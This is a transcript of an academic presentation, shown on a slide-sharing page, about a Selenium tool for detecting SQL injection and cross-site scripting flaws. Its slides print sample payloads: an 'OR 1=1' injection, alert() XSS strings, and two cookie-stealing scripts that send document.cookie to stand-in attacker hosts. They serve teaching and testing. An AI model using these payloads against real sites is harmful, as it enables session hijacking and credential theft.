Detecting Application-Level Vulnerabilities: An Insightful Analysis
Explore the world of application-level vulnerabilities, including SQL Injection and Cross-Site Scripting, through a comprehensive tool designed to detect and mitigate potential risks. Learn about the impact of XSS attacks, the importance of secure coding practices, and strategies to safeguard sensitive data from malicious exploits.
Download Presentation
Please find below an Image/Link to download the presentation.
The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.
You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.
The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.
E N D
Presentation Transcript
Security Tool to Detect Vulnerabilities at Application Level Sendurr Selvaraj Naga Sri Charan Pendyala Rama Krishna Chaitanya Somavajhala Srujana Bollina Udaya Shyama Pallathadka Ganapathi Bhat [1] R Ben Stock, Stephan Pfistner, Bernd Kaiser, Sebastian Lekies and Martin Johns: From Facepalm to Brain Bender: Exploring Client-Side Cross-Site Scripting, in 22th ACM Conference on Computer and Communications Security (ACM CCS'15), October 2015 [2] S. Lekies, B. Stock, and M. Johns. 25 Million Flows Later: Large-scale Detection of DOM-based XSS. In CCS, 2013 [3] Dennis Appelt, Cu Duy Nguyen, Lionel C. Briand, and Nadia Alshahwan. 2014. Automated testing for SQL injection vulnerabilities: an input mutation approach. In Proceedings of the 2014 International Symposium on Software Testing and Analysis (ISSTA 2014). ACM, New York, NY, USA, 259-269.
Outline Introduction SQL Injection and Cross Site Scripting Client Side XSS Problem Statement Examples and Impact of XSS Selenium Webdriver and its Usage Proposed Approach to solve XSS attack Questions and Discussion
Introduction: 1st Website: August 6, 1991 1 Billion+ Counting Source: http://intellavis.com/blog/?p=284
Introduction: Different vulnerabilities that are present in web applications: SQL Injection XSS Cross-site scripting CSRF Cross-site request forgery
SQL Injection SQL Injection attacks target database- driven systems by injecting SQL code fragments into vulnerable input parameters that are not properly checked and sanitized.
SQL Injection Parameter: $country <- United States of America Resulting Statement: SELECT * FROM hotelList WHERE country= United States of America Attacker Input: $country<- OR 1=1 Resulting Statement: SELECT * FROM hotelList WHERE country= OR 1=1 - - https://www.youtube.com/watch?v=h-9rHTLHJTY
SQL Injection Confidentiality: SQL databases generally hold sensitive data Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password. Authorization: If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL Injection vulnerability. Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL Injection attack. Source: OWASP.ORG
What is Cross-Site Scripting? (CSS/XSS) An attacker is able to inject his own JavaScript code into a web application, in such a way that the code is executed within a victim s browser in the context of application. Types: Persistent XSS (Stored XSS) Server side Reflected XSS (Non-Persistent XSS) DOM-based XSS (Local XSS) Client side Players Include: An Attacker Web Application Client
Client Side Cross-Site Scripting Client XSS occurs when untrusted user supplied data is used to update the DOM with an unsafe JavaScript call A JavaScript call is considered unsafe if it can be used to introduce valid JavaScript into the DOM Source of this data could be from the DOM, or it could have been sent by the server (via an AJAX call, or a page load or page submission).
Client Side Cross-Site Scripting As per the authors of paper[1], studies have shown that one in ten websites are vulnerable to XSS attack Authors discover that root causes of client side XSS range from unaware developers to incompatible first- and third- party codes A set of 1273 vulnerabilities in Alexa Top 10k domains are analyzed and classified based on the complexity
Cross-Site Scripting: Problem statement Main problem: attacker s content ends in document and is not properly filtered/encoded common for server- and client-side flaws Flow of data: from attacker-controllable source to security- sensitive sink Authors Focus: client side JavaScript code Sources: e.g. the URL Sinks: e.g. document.write
Examples of XSS Vulnerabilities <script> alert( Hacked..!! ) </script>
<img src=x onerror="alert('Pop-up window via stored XSS');
Cookie Stealing http://www.malicious.site/welcome.html?name=<script>alert(document.cookie) </script> http://www.malicious.site/welcome.cgi?name=<script>window.open( http://www.attacker.site/collect.cgi?cookie= %2Bdocument.cookie) </script>
Name parameter is protected : http://www.malicious.site/welcome.html?notname=<script>(document.cookie)</script> More secure and requires name parameter to be sent: http://www.malicious.site/welcome.html?notname=<script>alert(document.cookie) <script>&name=John
Examples of DOM-based XSS Vulnerabilities 1. <script type='text/javascript'>alert('xss');</script> <img src=x onerror="alert('Pop-up window via stored XSS'); <script type= text/javascript > Document.write( <iframe src= http://attackerserver/cookiestealer.php?cookie= +document.cookie+ > </iframe> ); </script> 2. 3.
DOM XSS will appear when a source that can be controlled by the user is used in a dangerous sink. Popular Sinks Popular Sources HTML Modification sinks document.URL document.write document.documentURI (element).innerHTML location.href HTML modification to behaviour change location.search (element).src (in certain elements) location.* Execution Related sinks window.name eval document.referrer setTimout / setInterval execScript
Impacts of XSS Denial-of-Service Crash Users`Browser, Pop-Up-Flodding, Redirection attacker can hijack a logged in user s session. Access to authentication credentials for Web application Cookies, Username and Password Spoil public image of company
Securing a site against XSS attacks By performing in-house input filtering (input sanitation) By performing output filtering
Selenium WebDriver What is Selenium? Selenium is a cross-platform solution to perform automated testing of web applications. Open source framework Successor to Selenium RC Fully implemented and supported in Python, Ruby, Java, and C#
Selenium WebDriver API Interaction with page DOM elements (Finding Elements) Operations on DOM elements (Click, Sendkeys, Drag&Drop etc) Multi-Window handling and switching between frames WebDriver Waits to handle AJAX based operations
Driving Web browsers Selenium helps to interact with Web applications through web browsers. It has web drivers that are supported Internet Explorer driver Opera Driver Chrome Driver Firefox Driver iPhone Driver Android Driver HtmlUnit Driver Interactions with the web page and DOM elements can be commanded through these drivers using a programming language
Ways to find elements Elements on page can be found using DOM properties of the element Ways to find By.Id( id ); By.CssSelector( Selector ); By.Xpath( //xpath ); By.ClassName( name ); By.LinkText( linktext ); By.TagName( tagname );
WebDriver and Injection of Scripts Can be used interact an input text into fields on web page. Steps to inject scripts Find element Send keys (input script in form of text) Submit script (click submit element on the page) Post injection validation Changes to the page can be analyzed by validation Test cases are built based on scripts and respective validations
Intended approach Windows Form application Exporting vulnerabilities to remote Database Chrome Extension
Windows Form application Tool that handles test cases which can be built by developers Test cases can be developed specific to the vulnerability Specific to vulnerability, test cases can be used to more than one website Test cases can be shared among developer groups scope to open source Each test case includes script injection and post-validation Scripts can be fed to the tool in a conventional data format like Excel Failed test case detection Post injection validation on the page
Exporting vulnerabilities to remote Database Vulnerable URL and selectors of corresponding elements are exported to remote MySQL Database If failed the tool exports URL of the website Selector of Input text field Selector of element that submits the page data.
Chrome Extension Communicates with latest updated vulnerabilities recorded Presents the vulnerabilities to end users when they arrive to vulnerable website. Can be presented visually to end user with the help of selectors
Recap.. One in Ten websites are infected with XSS vulnerability With growing security concerns at application level, it is important to focus on XSS vulnerability There is no single reason for XSS vulnerability, reasons include developers unaware of vulnerability, use of first- and third party outdated libraries We discussed examples and impact of XSS We build windows form application to help developers build test cases Give users of chrome with an extension that would help them block sites vulnerable to XSS
Questions and Discussion Image source: http://en.hdyo.org/
